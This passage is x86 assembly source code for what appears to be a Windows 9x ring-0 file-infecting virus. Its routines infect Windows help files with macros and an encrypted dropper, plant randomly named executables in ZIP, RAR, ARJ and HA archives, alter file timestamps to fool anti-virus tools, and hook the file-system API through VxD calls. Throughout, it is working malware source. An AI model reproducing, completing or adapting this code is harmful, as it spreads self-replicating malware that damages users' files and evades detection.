[ESI.FILE_HEADER_RESERVEDSPACE],EAX ;7. WRITE MACRO HEADERS+OUR MACRO IN THE END OF MODULE LEA ECX,[EAX+SIZE FILE_HEADER+SIZE SYSTEM_HEADER] CALL HLP_WRITE_FILE POP EDI JB INF_EXIT LODSD ;FILE_HEADER_RESERVEDSPACE SUB EAX,ECX ;8. REWRITE OLD "SYSTEM" DATA IN THE END OF MODULE MOV CX,LEN_IOBUFF-4 WRITE_NEXT_BLK: SUB EAX,ECX JAE IS_LONG_DATA ADD ECX,EAX XOR EAX,EAX IS_LONG_DATA: PUSH EAX MOV EAX,EDI ADD EDI,ECX CALL READ_FILE JB EXIT_READWRITE CALL HLP_WRITE_FILE EXIT_READWRITE: POP EAX JB WAS_ERROR AND EAX,EAX JNE WRITE_NEXT_BLK ;9. WRITE CORRECTED HLP_HEADER (VIA WRITE_FILE) LEA ESI,HLP_HEADER[EDX] PUSH SIZE HLP_START POP ECX CALL WRITE_FILE ;ASSUME THAT EAX=0 ;10. CREATE AND WRITE ENCRYPTED DROPPER IN THE END OF FILE (VIA HLP_WRITE_FILE) CALL SPE_THUNK ;ECX=LENGTH OF DROPPER PUSH ECX ESI LEA EDI,FIRST_DROP_MASK[EDX] MOV AX,[EDI] ENCRYPT_HDROP: XOR [ESI],AX ADD AX,RELO_MASK2[EDI] INC ESI LOOP ENCRYPT_HDROP POP ESI ECX CALL HLP_WRITE_FILE ;11. WRITE HLP_DIRECTORY WITH CORRECTED OFFSET OF "SYSTEM" BLOCK LEA ESI,HLP_DIRECTORY[EDX] MOV EAX,[ESI.HLP_START_DIRECTORYSTART-SIZE HLP_START] MOV CX,LEN_HLP_DIR AND 0FF00H ;------------------------------------------------ SET_WRITE_FILE: CALL SET_DATE JMP WRITE_FILE ;------------------------------------------------ READ_FILE_BUFF_0: XOR EAX,EAX READ_FILE_BUFF: LEA ESI,MAIN_BUFF[EDX] MOV CX,SIZE_MBUFF JMP READ_FILE ;------------------------------------------------ ZIP_READ_FILE: ADD EAX,ZIP_CUR_OFF[EDX] MOV ZIP_CUR_OFF[EDX],EAX ;ENTRY: EAX=POS,ECX=LENGTH,EBX=HANDLE,ESI=&BUFFER4READ ;EXIT: CF=1 IF ERROR AND EAX=ERROR CODE OR EAX=(REAL BYTES READ-LENGTH) READ_FILE PROC PUSH EDX MOV DX,R0_READFILE GO_READ: XCHG EAX,EDX CALL FILE_IO POP EDX JB WAS_ERROR SUB EAX,ECX WAS_ERROR: RET ENDP ;------------------------------------------------ HLP_WRITE_FILE: MOV EAX,[HLP_HEADER.HLP_START_ENTIREFILESIZE][EDX] ADD [HLP_HEADER.HLP_START_ENTIREFILESIZE][EDX],ECX ;------------------------------------------------ WRITE_FILE: PUSH EDX MOV DX,R0_WRITEFILE JMP GO_READ ;------------------------------------------------ SET_DATE: XOR 1 PTR [ESP+8],1 ;CHANGE TIME FOR FOOLING ADINF/AVPI SET_TIME: PUSH EAX CALL GET_SYS_TIME MOV INF_TIME[EDX],EAX POP EAX RETN ;------------------------------------------------ ;ENTRY: EDI=&BUFFER FOR STORING MACROS ;EXIT: EAX=LENGTH OF MACRO GEN_MACROS PROC PUSH EBX ESI EBP EDI LEA EDI,TEMP_EXT[EDX] CALL GEN_EXT ;EAX = 0 LEA EDI,RDROP_NAME[EDX] CALL GEN_NAME MOV EAX,'MOC.' STOSD XOR AL,AL STOSB CALL GET_RANDOM_MSK XCHG EAX,ECX CALL GET_RANDOM_MSK MOV AH,CL ADD AX,'AA' LEA ESI,RUN_DROPPER[EDX] LEA EDI,MAIN_BUFF[EDX] MOV 2 PTR DS:UU_MASK[ESI],AX MOV CL,LEN_UUD REP MOVSB MOV CL,LEN_RDROP_CON XCHG EAX,EBX UUE_BYTE: LODSB PUSH EAX SHR AL,4 ADD AL,BL STOSB POP EAX AND AL,0FH ADD AL,BH STOSB LOOP UUE_BYTE POP EDI PUSH EDI LEA ESI,RR_MACRO[EDX] CALL HLP_STORE LEA ESI,MAIN_BUFF[EDX] XOR EBP,EBP ;FIRST ITERATION MOV EBX,(LEN_UUD+2*LEN_RDROP_CON) ;LENGTH OF MACROS NEXT_ITER: PUSH ESI CALL HLP_STORE_DROP DEC EDI ;SKIP '\0' MOV CL,HLP_LEN_LINE SUB EBX,ECX JAE NO_LAST_STR ADD ECX,EBX XOR EBX,EBX NO_LAST_STR: POP ESI REP MOVSB CMP ECX,EBP XCHG EAX,EBP ;LENGTH ADDRESS MOV AL,'>' STOSB JE FIRST_ITER STOSB FIRST_ITER: CALL MACRO_FNAME PUSH ESI CALL HLP_STORE_SLEEP POP ESI AND EBX,EBX JNE NEXT_ITER CALL HLP_STORE_DROP DEC EDI ;SKIP '\0' DEC EDI MOV 4 PTR [EDI-4],' NER' XCHG EAX,EBP CALL MACRO_FNAME MOV AX,'* ' STOSW MOV EAX,'MOC.' STOSD PUSH EAX CALL HLP_STORE_SLEEP LEA ESI,EXEC_MACRO_1[EDX] CALL HLP_STORE DEC EDI ;SKIP '\0' XCHG EAX,EBP ;LENGTH ADDRESS CALL MACRO_FNAME POP 4 PTR [EDI-4] MOV CL,LEN_EXEC_2 REP MOVSB CALL CORR_LENGTH XCHG EAX,EDI POP EDI SUB EAX,EDI ;LENGTH POP EBP ESI EBX RET ENDP ;------------------------------------------------ HLP_STORE_SLEEP: MOV EAX,')0,"' STOSD MOV AX,")'" STOSW CALL CORR_LENGTH LEA ESI,SLEEP_MACRO[EDX] JMP HLP_STORE HLP_STORE_DROP: LEA ESI,DROP_MACRO[EDX] HLP_STORE PROC PUSH ID_CONFIG POP EAX STOSW PUSH EDI XOR EAX,EAX STOSW XCHG EAX,ECX PUSH ESI LEA ESI,CHK_NT[EDX] MOV CL,LEN_CHK_NT REP MOVSB POP ESI MOV CL,LEN_CHK_NT SZ_STORE: LODSB STOSB INC ECX AND AL,AL JNE SZ_STORE POP EAX MOV [EAX],CX RET ENDP ;-------------------------------------- ;RETURN: EAX - ENTRY TO INTRUDING NO_ENDP: MOV ECX,EBX JECXZ LIST_EMPTY XCHG EAX,ECX CALL GET_RANDOM MOV EAX,[ESP+EAX*4] CLEAR_STACK: POP ESI DEC EBX JNE CLEAR_STACK LIST_EMPTY: POP EBX RETN FIND_PLACE: PUSH EBX XOR EBX,EBX FIND_ENDP: LODSB CMP AL,0C3H ;RETN JE FOUND_RETN CMP AL,0C2H ;RETN X LOOPNE FIND_ENDP JNE NO_ENDP INC ESI ;SKIP X INC ESI DEC ECX FOUND_RETN: DEC ECX CMP ECX,0FH+LEN_LOADER JL NO_ENDP PUSH ESI ADD ESI,3 AND ESI,NOT 3 FIND_PROC: LODSB CMP AL,55H ;PUSH BP JNE NO_PUSH_BP CMP 2 PTR [ESI],0EC8BH JE FOUND_PROC CMP 2 PTR [ESI],0E589H JE FOUND_PROC NO_PUSH_BP: CMP AL,0C8H ;ENTER X,0 JNE NO_ENTER CMP CH,[ESI+2] JE FOUND_PROC NO_ENTER: CMP AL,53H ;PUSH EBX JNE NO_PUSH_EBX CMP 2 PTR [ESI],5756H ;PUSH ESI/PUSH EDI JE FOUND_PROC NO_PUSH_EBX: AND AL,NOT 2 CMP AL,81H JNE NO_SUBADD CMP 1 PTR [ESI],0ECH ;SUB ESP,X JE FOUND_PROC NO_SUBADD: ADD ESI,3 MOV EAX,ESI AND AL,0CH JE FIND_PROC CMP AL,8 JAE FIND_PROC FOUND_PROC: XCHG EAX,ESI POP ESI JNE FIND_ENDP DEC EAX PUSH EAX ESI ECX XCHG EAX,ESI MOV CX,LEN_LOADER FIND_ENDP_X: LODSB AND AL,NOT 1 CMP AL,0C2H ;RETN/RETN X LOOPNE FIND_ENDP_X POP ECX ESI EAX JE FIND_ENDP PUSH EAX INC EBX JMP FIND_ENDP ;------------------------------------------------ ;ENTRY: EDI=&NAME BUFFER GEN_NAME PROC MOV AL,3 CALL GET_RANDOM_BYTE GEN_EXT: ADD AL,3 ;3-5 LETTERS XCHG EAX,ECX PUSH ECX NEXT_RCHAR: MOV AL,'Z'-'A'+1 CALL GET_RANDOM_BYTE ADD AL,'A' STOSB LOOP NEXT_RCHAR POP ECX RET ENDP ;------------------------------------------------ ;ENTRY: EDX=MEM DELTA ;EXIT: ECX=LENGTH OF DROPPER (EBX,EDX PRESERVED),ESI=&ENCRYPT_BUFF SPE_THUNK PROC PUSH EBX EDX LEA EDI,RET_2_32[EDX] XOR EAX,EAX PUSH EAX DEC EAX SHRD EAX,EDX,16 PUSH EAX SHR EDX,16 INC EAX ;0 XCHG AL,DL PUSH DX MOV AH,10011010B ;P=1/DPL=0/S=1/NON-CONF/READ=1/ACCESS=0 PUSH AX MOV ESI,ALLOCATE_GDT_SELECTOR PUSH ESI CALL VXD_CALL XCHG EAX,EBX ;CODE SELECTOR MOV 1 PTR [ESP+1],10010010B ;P=1/DPL=0/S=1/DATA/TOP/WRITE=1/ACCESS=0 PUSH ESI CALL VXD_CALL ADD ESP,3*4 CLI MOV DS,AX MOV ES,AX INC ESI ;FREE_GDT_SELECTOR XOR ECX,ECX PUSH ECX EBX ESI EAX EBP CS EDI BX SMALL OFF_SPE DB 66H RETF GOFF RET_2_32 PUSH SS SS POP DS ES STI POP EBP ESI EBX PUSH EBX CALL VXD_CALL POP EAX PUSH ESI EBX CALL VXD_CALL MOVZX ECX,DI POP EAX EAX EDX EBX LEA ESI,ENCRYPT_BUFF[EDX] RET ENDP ;------------------------------------------------ GOFF INF_RAR CMP 4 PTR [ESI],RAR_SIGN JNE EXIT_RAR_TOP ADD ESI,7+3 TEST 1 PTR [ESI],1 ;VOLUME JNE EXIT_RAR_TOP AND 1 PTR [ESI],NOT 20H ;SKIP AUTHEN. BIT MOV CL,SIZE RAR_HEAD_HDR-2 DEC ESI CALL GET_CRC32 DEC ESI DEC ESI MOV [ESI],AX MOV CL,SIZE RAR_HEAD_HDR PUSH 7 POP EAX CALL WRITE_FILE JB EXIT_RAR_TOP MOV AL,7 ADD AX,[ESI.RAR_HEAD_SIZE] READ_RAR_FH: PUSH SIZE RAR_FILE_HDR POP ECX CALL ZIP_READ_FILE JNB RAR_READ_OK AND AL,AL JS GO_RAR_DONE EXIT_RAR_TOP: RETN RAR_READ_OK: CMP [ESI.RAR_F_HEAD_TYPE],RAR_FILE_SIGN GO_RAR_DONE: JNE RAR_DONE MOV AL,1 PTR [ESI.RAR_F_HEAD_FLAGS] AND AL,11100000B CMP AL,11100000B ;DIR? JE SKIP_EXE_RAR INC 4 PTR ZIP_FILE_COUNTER[EDX] CMP [ESI.RAR_METHOD],RAR_STORED JNE NO_INF_RAR CMP CH,1 PTR [ESI.RAR_FILE_TIME] JNE NO_INF_RAR CMP 2 PTR [ESI.RAR_FILE_DATE],TROJAN_STAMP JNE EXIT_RAR_TOP ADD EAX,LARGE 4 PTR RAR_FNAME+TROJAN_NAME_SIZE LEA ESI,MAIN_BUFF[EDX] MOV CX,SIZE_MBUFF PUSH ESI JMP ZIP_READ_FILE ;RUN TROJAN NO_INF_RAR: ADD CX,[ESI.RAR_FNAME_SIZE] LEA EDI,OUR_RAR_FHEADER.RAR_FNAME[EDX] PUSH ESI LARGE 4 PTR RAR_FNAME LARGE 4 PTR '\' CALL TEST_EXEC POP ESI JB SKIP_EXE_RAR PUSH ESI LEA EDI,OUR_RAR_FHEADER.RAR_HOST_OS[EDX] LEA ESI,[ESI.RAR_HOST_OS] MOV [EDI-RAR_HOST_OS+RAR_F_HEAD_TYPE],RAR_FILE_SIGN MOV [EDI-RAR_HOST_OS+RAR_F_HEAD_FLAGS+1],80H MOVSB CMPSD MOVSD MOV [EDI-4],DL MOVSB MOV AL,RAR_STORED STOSB MOV EAX,ECX STOSW ADD AX,SIZE RAR_FILE_HDR MOV [EDI-RAR_FILE_ATTRIB+RAR_F_HEAD_SIZE],AX POP ESI SKIP_EXE_RAR: MOVZX EAX,[ESI.RAR_F_HEAD_SIZE] ADD EAX,[ESI.RAR_COMPRESSED_SIZE] JMP READ_RAR_FH RAR_DONE: CALL CHECK_ARCOUNT JB GO_EXIT_ZIP_TOP PUSH ESI ECX LEA ESI,OUR_RAR_FHEADER[EDX]+2 MOV [ESI.RAR_COMPRESSED_SIZE-2],ECX MOV [ESI.RAR_ORIGINAL_SIZE-2],ECX MOV [ESI.RAR_CRC32-2],EAX MOV CX,[ESI.RAR_F_HEAD_SIZE-2] DEC ECX DEC ECX CALL GET_CRC32 DEC ESI DEC ESI MOV [ESI],AX INC ECX INC ECX CALL ZIP1_INSERT_FILE POP ECX ESI GO_EXIT_ZIP_TOP: JB EXIT_ZIP_TOP SET_INSERT: CALL SET_DATE ;------------------------------------------------ ;ENTRY: ESI=DATA FOR WRITE,ECX=SIZEOF(ESI),EAX=POS IN FILE ZIP1_INSERT_FILE: MOV EAX,ZIP_CUR_OFF[EDX] ZIP_INSERT_FILE: ADD ZIP_CENTRAL_OFF[EDX],ECX ADD ZIP_CUR_OFF[EDX],ECX INSERT_FILE: PUSH ESI EDI ECX EAX CALL GETSIZE_FILE XCHG EDI,EAX MOV CX,LEN_IOBUFF INSERT_NEXT: SUB EDI,ECX CMP EDI,[ESP] JAE FULL_INSBUFF ADD ECX,EDI MOV EDI,[ESP] SUB ECX,EDI FULL_INSBUFF: LEA ESI,INSERT_BUFF[EDX] MOV EAX,EDI CALL READ_FILE JB INS_POP MOV EAX,[ESP+4] ADD EAX,EDI CALL WRITE_FILE JB INS_POP CMP EDI,[ESP] JNE INSERT_NEXT INS_POP: POP EAX ECX EDI ESI JNB WRITE_FILE EXIT_ZIP_TOP: RET ;------------------------------------------------ GOFF INF_ZIP ;1. FIND CENTRAL AREA FIND_ZCENTRAL: CMP [ESI.ZIP_LOC_SIGN_],ZIP_LOCAL_SIGN JNE EXIT_ZIP_TOP MOV CL,SIZE ZIP_CENTRAL_HEADER MOV AL,SIZE ZIP_LOCAL_HEADER ADD EAX,[ESI.ZIP_COMPRESSED_SIZE] ADD AX,[ESI.ZIP_SIZE_FNAME] ADD AX,[ESI.ZIP_EXTRA_FIELD_LENGTH] CALL ZIP_READ_FILE JB EXIT_ZIP_TOP CMP [ESI.ZIP_CENTR_SIGN_],ZIP_CENTRAL_SIGN JNE FIND_ZCENTRAL PUSH 4 PTR ZIP_CUR_OFF[EDX] POP 4 PTR ZIP_CENTRAL_OFF[EDX] ;2. FIND END HEADER AND CHECK FILE COUNTER (AND IF EXECUTABLE FILE PRESENT) FIND_ZEND: TEST 1 PTR [ESI.ZIP_EXTRNL_FILE_ATTR_],FA_DIRECTORY JNE SKIP_EXE_TEST INC 4 PTR ZIP_FILE_COUNTER[EDX] CMP AL,1 PTR [ESI.ZIP_FILE_TIME_] JNE CONT_CHECK CMP AX,[ESI.ZIP_COMPRESSION_METHOD_] JE EXIT_ZIP_TOP CONT_CHECK: ADD CX,[ESI.ZIP_SIZE_FNAME_] LEA EDI,OUR_LOCAL_HEADER.ZIP_LOCAL_FNAME[EDX] PUSH ESI LARGE 4 PTR ZIP_CENTRAL_FNAME LARGE 4 PTR '/' CALL TEST_EXEC JB SKIP_EXE_TEST_POP MOV OUR_LOCAL_HEADER.ZIP_SIZE_FNAME[EDX],CX LEA EDI,OUR_CENTRAL_HEADER.ZIP_CENTRAL_FNAME[EDX] MOV OUR_CENTRAL_HEADER.ZIP_SIZE_FNAME_[EDX],CX REP MOVSB POP ESI LEA EDI,OUR_LOCAL_HEADER[EDX] MOV EAX,ZIP_LOCAL_SIGN STOSD MOV EAX,4 PTR [ESI.ZIP_VER_NED_TO_EXTR] STOSD INC EDI INC EDI MOV EAX,4 PTR [ESI.ZIP_FILE_TIME_] XOR AL,AL STOSD LEA EDI,OUR_CENTRAL_HEADER[EDX] PUSH ESI MOVSD MOVSD MOVSD MOV [EDI-2],CX MOVSD MOV [EDI-4],CL SKIP_EXE_TEST_POP: POP ESI SKIP_EXE_TEST: MOV CL,SIZE ZIP_CENTRAL_HEADER MOV EAX,ECX ADD AX,[ESI.ZIP_SIZE_FNAME_] ADD AX,[ESI.ZIP_EXTRA_FIELD_LENGTH_] ADD AX,[ESI.ZIP_FILE_COMMENT_LENGTH_] CALL ZIP_READ_FILE JNB ZIP_READ_OK AND AL,AL JS ZIP_READ_OK EXIT_ZIP: RETN ZIP_READ_OK: CMP [ESI.ZIP_CENTR_SIGN_],ZIP_CENTRAL_SIGN JE FIND_ZEND CMP [ESI.ZIP_END_SIGN_],ZIP_END_SIGN JNE EXIT_ZIP CALL CHECK_ARCOUNT JB EXIT_ZIP ;3. GENERATE DROPPER AND INSERT LOCAL HEADER+DROPPER AT ZIP_CENTRAL_OFF PUSH ESI ECX LEA ESI,OUR_LOCAL_HEADER[EDX] MOV [ESI.ZIP_CRC_32],EAX MOV [ESI.ZIP_COMPRESSED_SIZE],ECX MOV [ESI.ZIP_UNCOMPRESSED_SIZE],ECX LEA EDI,OUR_CENTRAL_HEADER[EDX] MOV [EDI.ZIP_CRC_32_],EAX MOV [EDI.ZIP_COMPRESSED_SIZE_],ECX MOV [EDI.ZIP_UNCOMPRESSED_SIZE_],ECX MOV EAX,ZIP_CENTRAL_OFF[EDX] MOV [EDI.ZIP_REL_OFF_OF_LOC_HDR_],EAX PUSH SIZE ZIP_LOCAL_HEADER POP ECX ADD CX,[ESI.ZIP_SIZE_FNAME] CALL ZIP_INSERT_FILE POP ECX ESI JB EXIT_ZIP MOV EAX,ZIP_CENTRAL_OFF[EDX] CALL ZIP_INSERT_FILE GO_EXIT_ZIP: JB EXIT_ZIP ;4. INSERT CENTRAL HEADER AT ZIP_CUR_OFF (ZIP_END_OFF) MOV ESI,EDI PUSH SIZE ZIP_CENTRAL_HEADER POP ECX ADD CX,[ESI.ZIP_SIZE_FNAME_] PUSH 4 PTR ZIP_CENTRAL_OFF[EDX] CALL ZIP1_INSERT_FILE LEA ESI,BUFF_ZIP_HEADER[EDX] POP [ESI.OFF_OF_STRT_OF_CENT_DIRECTORY] JB GO_EXIT_ZIP ;5. WRITE END HEADER AT ZIP_CUR_OFF (NEW ZIP_END_OFF) ADD [ESI.SIZE_OF_THE_CENTRAL_DIRECTORY],ECX INC [ESI.TTL_NUM_OF_ENT_ON_THIS_DISK] INC [ESI.TTL_NUM_OF_ENT_IN_THE_CENT_DIR] PUSH SIZE ZIP_END_HEADER POP ECX MOV EAX,ZIP_CUR_OFF[EDX] GO_WRITE_FILE: JMP SET_WRITE_FILE ;------------------------------------------------ FNAME_OFF = 4 PTR [ESP+8] PATH_SEPARATOR = 4 PTR [ESP+4] ;ENTRY: ESI=WORK BUFFER,EDI=&NAME BUFFER,ECX=READ LENGTH ;EXIT: ESI=STORED PATH+NAME,ECX=SIZEOF(EDI) TEST_EXEC: MOV EAX,ZIP_CUR_OFF[EDX] CALL READ_FILE JB TEST_ERR SUB ECX,FNAME_OFF ADD ESI,FNAME_OFF TEST_EXEC_SPEC: CMP DL,ZIP_EXEC_FLAG[EDX] JNE TEST_ERR_STC MOV EAX,[ESI+ECX-4] OR EAX,20202000H CMP EAX,'moc.' JE IS_EXECUTABLE CMP EAX,'exe.' TEST_ERR_STC: STC JNE TEST_ERR IS_EXECUTABLE: MOV EAX,PATH_SEPARATOR STORE_PATH: CMP AL,[ESI+ECX-1] LOOPNE STORE_PATH JNE NO_ARC_PATH INC ECX NO_ARC_PATH: PUSH EDI ECX REP MOVSB CALL GEN_NAME MOV AL,2 CALL GET_RANDOM_BYTE MOV EAX,'MOC.' JE IS_ARC_COM MOV EAX,'EXE.' IS_ARC_COM: STOSD POP EAX ESI ADD ECX,EAX ADD ECX,4 INC 1 PTR ZIP_EXEC_FLAG[EDX] TEST_ERR: RETN 2*4 ;------------------------------------------------ CHECK_ARCOUNT: CMP 4 PTR ZIP_FILE_COUNTER[EDX],MIN_ARC_FILES JB ERR_INS SUB 1 PTR ZIP_EXEC_FLAG[EDX],1 JB ERR_INS CALL SPE_THUNK ;------------------------------------------------ ;ENTRY: ESI=&STRING,ECX=STRLEN ;EXIT: EAX=CRC32 GET_CRC32 PROC PUSH ESI EBX ECX XOR EBX,EBX DEC EBX NEXT_BYTE: PUSH ECX XOR EAX,EAX LODSB XOR AL,BL PUSH 8 POP ECX SHR EBX,CL NEXT_BIT: SHR EAX,1 JNB NO_ODD XOR EAX,0EDB88320H NO_ODD: LOOP NEXT_BIT XOR EBX,EAX POP ECX LOOP NEXT_BYTE XCHG EBX,EAX NOT EAX POP ECX EBX ERR_INS_POP: POP ESI ERR_INS: RET ENDP ;------------------------------------------------ GOFF INF_ARJ XOR EAX,EAX READ_ARJ_FH: MOV CX,SIZE ARJ_HDR_STRUC+MAX_PATH+12 CALL ZIP_READ_FILE JNB ARJ_READ_OK ADD ECX,EAX JNB ERR_INS CMP ECX,4 JB ERR_INS ARJ_READ_OK: CMP [ESI.ARJ_HEADER_ID],ARJ_SIGN JNE ERR_INS XOR EAX,EAX CMP [ESI.ARJ_BAS_HDR_SIZE],AX JE ARJ_DONE TEST [ESI.ARJ_FLAGS],4 ;VOLUME_FLAG JNE ERR_INS CMP [ESI.ARJ_FILE_TYPE],1 ;BINARY/TEXT JA SKIP_EXE_ARJ INC 4 PTR ZIP_FILE_COUNTER[EDX] CMP AL,[ESI.ARJ_COMPRESS_METHOD] ;ARJ_STORED JNE NO_INF_ARJ CMP AL,1 PTR [ESI.ARJ_FILE_TIME] JE ERR_INS NO_INF_ARJ: LEA EDI,[ESI.ARJ_FNAME] TEST [ESI.ARJ_FLAGS],8 ;EXTFILE_FLAG JE NO_ARJ_EXT SCASD NO_ARJ_EXT: SUB ECX,LARGE 4 PTR ARJ_FNAME JB ERR_INS PUSH ESI MOV ESI,EDI REPNE SCASB LEA ECX,[EDI-1] JNE ERR_INS_POP SUB ECX,ESI LEA EDI,OUR_ARJ_FHEADER.ARJ_FNAME[EDX] PUSH EAX LARGE 4 PTR '/' CALL TEST_EXEC_SPEC POP ESI JB SKIP_EXE_ARJ LEA EDI,OUR_ARJ_FHEADER[EDX] MOV [EDI.ARJ_ENTRYNAME_POS],AX MOV AX,ARJ_SIGN STOSD ADD ECX,SIZE ARJ_HDR_STRUC-4+2 MOV [EDI-2],CX MOV OUR_ARJ_FH_LEN[EDX],ECX MOV AL,1EH STOSB MOV EAX,4 PTR [ESI.ARJ_VER_NUM] STOSD AND 1 PTR [EDI-1],10H MOV EAX,4 PTR [ESI.ARJ_FILE_TIME] XOR AL,AL MOV [EDI+3],EAX SKIP_EXE_ARJ: MOVZX EAX,[ESI.ARJ_BAS_HDR_SIZE] ADD EAX,8 NEXT_ARJ_EXT: PUSH 2 POP ECX CALL ZIP_READ_FILE JB EXIT_ARJ CMP AX,[ESI] XCHG EAX,ECX JE END_ARJ_EXT ADD AX,[ESI] ADD EAX,4 JMP NEXT_ARJ_EXT END_ARJ_EXT: CMP [ESI.ARJ_FILE_TYPE],1 JA GO_READ_ARJ_FH ADD EAX,[ESI.ARJ_COMPRESSED_SIZE] GO_READ_ARJ_FH: JMP READ_ARJ_FH ARJ_DONE: CALL CHECK_ARCOUNT JB EXIT_ARJ PUSH ESI ECX LEA ESI,OUR_ARJ_FHEADER[EDX+4] MOV [ESI.ARJ_COMPRESSED_SIZE-4],ECX MOV [ESI.ARJ_ORIGINAL_SIZE-4],ECX MOV [ESI.ARJ_CRC32-4],EAX MOV ECX,12345678H GOFF OUR_ARJ_FH_LEN,4 CALL GET_CRC32 MOV [ESI+ECX],EAX ADD ECX,10 SUB ESI,4 CALL ZIP1_INSERT_FILE POP ECX ESI JNB SET_INSERT EXIT_ARJ: RETN ;------------------------------------------------ GOFF INF_HA CMP [ESI.HA_M_SIGN],HA_SIGN JNE EXIT_ARJ CMPSD ;ADD ESI,SIZE HA_MAIN_HEADER INC 2 PTR [ESI-2] ;INC 2 PTR [ESI.HA_M_FILE_CNT] MOV AL,4 READ_HA_FH: XOR ECX,ECX MOV CL,SIZE HA_FILE_HEADER+MAX_DOS_PATH CALL ZIP_READ_FILE JNB HA_READ_OK ADD ECX,EAX JNB EXIT_ARJ JE HA_DONE HA_READ_OK: AND [ESI.HA_VER_METHOD],0FH JNE NO_INF_HA CMP DL,1 PTR [ESI.HA_FILE_TIME] JE EXIT_ARJ NO_INF_HA: LEA EDI,[ESI.HA_PATH] SUB ECX,LARGE 4 PTR HA_PATH JB EXIT_ARJ XOR EAX,EAX REPNE SCASB JNE EXIT_ARJ REPNE SCASB JNE EXIT_ARJ LEA ECX,[EDI-1] MOV AL,[EDI] INC EAX SUB EDI,ESI ADD EDI,EAX PUSH EDI CMP [ESI.HA_VER_METHOD],0EH JE SKIP_EXE_HA INC 4 PTR ZIP_FILE_COUNTER[EDX] MOV AH,[ECX+2] PUSH ESI LEA ESI,[ESI.HA_PATH] SUB ECX,ESI LEA EDI,OUR_HA_FHEADER.HA_PATH[EDX] PUSH EAX EAX LARGE 0 CALL TEST_EXEC_SPEC POP EAX LEA EDI,[ESI+ECX+1] POP ESI JB SKIP_EXE_HA MOV AL,2 STOSW LEA EDI,OUR_HA_FHEADER[EDX] ADD ECX,SIZE HA_FILE_HEADER+3 MOV OUR_HA_FH_LEN[EDX],ECX MOV AL,HA_STORED STOSB MOV EAX,4 PTR [ESI.HA_FILE_TIME] XOR AL,AL MOV 4 PTR [EDI.HA_FILE_TIME-1],EAX SKIP_EXE_HA: POP EAX ADD EAX,[ESI.HA_COMPRESS_SIZE] JMP READ_HA_FH HA_DONE: CALL CHECK_ARCOUNT JB EXIT_HA PUSH ESI ECX LEA ESI,OUR_HA_FHEADER[EDX] MOV [ESI.HA_COMPRESS_SIZE],ECX MOV [ESI.HA_ORIGINAL_SIZE],ECX MOV [ESI.HA_CRC32],EAX MOV ECX,12345678H GOFF OUR_HA_FH_LEN,4 CALL ZIP1_INSERT_FILE POP ECX ESI JB EXIT_HA CALL ZIP1_INSERT_FILE LEA ESI,HEADER[EDX] PUSH 4 POP ECX JNB SET_WRITE_FILE EXIT_HA: RETN ;------------------------------------------------ GET_WININIT: LEA ESI,WININIT_INI[EDX] MOV CL,LEN_WININIT_INI ;ENTRY: ESI=&FILENAME,CL=STRLEN(ESI)+1 ;EXIT: ESI=&FULLNAME CONCAT_WINDIR: MOVZX ECX,CL LEA EDI,TMP_PATH[EDX] PUSH EDI ESI MOV ESI,[EDI-SYS_PATH_DELTA] COPY_SYS_PATH: MOVSB CMP DL,[ESI] JNE COPY_SYS_PATH POP ESI REP MOVSB MOV [EDI],CL POP ESI RETN ;------------------------------------------------ ;ENTRY: ON STACK - DWORD OF VXD GOFF CLI_VXD_CALL CLI GOFF OFF_VXD_CALL VXD_CALL PROC PUSH EAX LEA EAX,[EBP-6] MOV 2 PTR [EAX],1234H ORG $-2 INT 20H XCHG EAX,[ESP+4] XCHG EAX,[ESP+8] MOV [EBP-4],EAX POP EAX RET ENDP ;------------------------------------------------ OPEN_CREATE: XOR ECX,ECX PUSH ACTION_CREATEALWAYS POP EDX MOV BX,OPEN_FLAGS_COMMIT OR OPEN_FLAGS_NOCRITERR OR \ ACCESS_WRITEONLY OR OPEN_SHARE_DENYREADWRITE JMP GO_OPEN_CREATE OPEN_FILE_RO: MOV BL,OPEN_ACCESS_RO_NOMODLASTACCESS OR OPEN_SHARE_DENYWRITE ;BL=METHOD OPEN_FILE: XOR EDX,EDX INC EDX ;FILE_OPEN MOV BH,OPEN_FLAGS_NOCRITERR SHR 8 GO_OPEN_CREATE: MOV AX,R0_OPENCREATFILE JMP FILE_IO ;------------------------------------------------ GET_ATTRIBUTES: MOV AL,FGET_ATTRIBUTES CMP EAX,12345678H ORG $-4 ;------------------------------------------------ CLR_ATTRIBUTES: XOR ECX,ECX SET_ATTRIBUTES: MOV AL,FSET_ATTRIBUTES ;------------------------------------------------ MAN_ATTRIBUTES: MOV AH,R0_FILEATTRIBUTES SHR 8 CMP EAX,12345678H ORG $-4 ;------------------------------------------------ CLOSE_FILE: MOV AX,R0_CLOSEFILE ;------------------------------------------------ FILE_IO: MOVZX EAX,AX PUSH RING0_FILEIO GO_VXD_CALL: CALL VXD_CALL RETN ;------------------------------------------------ DELETE_FILE: MOV CL,27H ;ALL ATTRIBUTES MOV AX,R0_DELETEFILE JMP FILE_IO ;------------------------------------------------ GET_SYS_TIME: PUSH GET_SYSTEM_TIME JMP GO_VXD_CALL ;------------------------------------------------ GETSIZE_FILE: MOV AX,R0_GETFILESIZE JMP FILE_IO ;------------------------------------------------ IAPI_HOOKER PROC GOFF OFF_IAPI_HOOKER BREAK PUSHAD ENTERD STACK_FRAME,0 ;FOR VXD_CALL CALL CALC_DELTA PUSH 4 PTR OLD_IFS_HOOKER[EDX] POP 4 PTR [EBP+4+7*4] ;EAX CALL TEST_VXD JE IAPI_EXIT LEA EAX,OFF_IFS_HOOKER[EDI] PUSH EAX CALL 4 PTR OLD_RAPI_HOOKER[EDI] ;REMOVE OUR API HOOKER PUSH 4 PTR [EBP+4+8*4+4] ;1ST PARAMETER MOV ESI,12345678H GOFF OLD_IAPI_HOOKER,4 CALL ESI ;INSTALL NEW API HOOKER MOV [EBP+4+7*4],EAX ;EAX POP EAX CALL ESI ;REINSTALL OUR API HOOKER MOV OLD_IFS_HOOKER[EDI],EAX IAPI_EXIT: LEAVED POPAD RET ENDP ;------------------------------------------------ RAPI_HOOKER PROC GOFF OFF_RAPI_HOOKER BREAK PUSHAD ENTERD STACK_FRAME,0 ;FOR VXD_CALL CALL CALC_DELTA CALL TEST_VXD JNE RAPI_EXIT LEA EAX,RAPI_RET_ADDRESS[EDI] MOV [EAX+1],EDX ;STORE ORIGINAL RETURN ADDRESS MOV [EBP+4+8*4],EAX ;RETURN ADDRESS RAPI_EXIT: LEAVED POPAD PUSH 12345678H GOFF OLD_RAPI_HOOKER,4 RET GOFF RAPI_RET_ADDRESS PUSH 12345678H 